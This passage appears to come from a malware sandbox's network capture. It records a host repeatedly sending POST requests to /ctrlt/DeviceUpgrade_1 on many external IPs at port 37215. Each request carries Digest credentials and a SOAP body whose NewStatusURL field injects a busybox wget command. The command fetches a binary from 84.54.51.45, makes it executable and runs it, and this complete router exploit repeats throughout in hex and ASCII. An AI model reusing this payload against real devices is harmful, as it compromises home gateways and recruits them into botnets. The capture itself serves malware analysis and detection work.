68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            77192.168.2.154397441.103.102.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733212948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            78192.168.2.153322041.147.68.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733251095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            79192.168.2.153304241.243.193.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733251095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            80192.168.2.155619041.97.197.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733278036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            81192.168.2.153756841.95.54.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733355045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            82192.168.2.154393441.29.18.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733355045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            83192.168.2.155094041.201.117.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733359098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            84192.168.2.154461841.115.214.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733407974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            85192.168.2.154642441.62.232.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733434916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            86192.168.2.155865041.230.63.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733457088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            87192.168.2.154103641.220.217.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733477116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
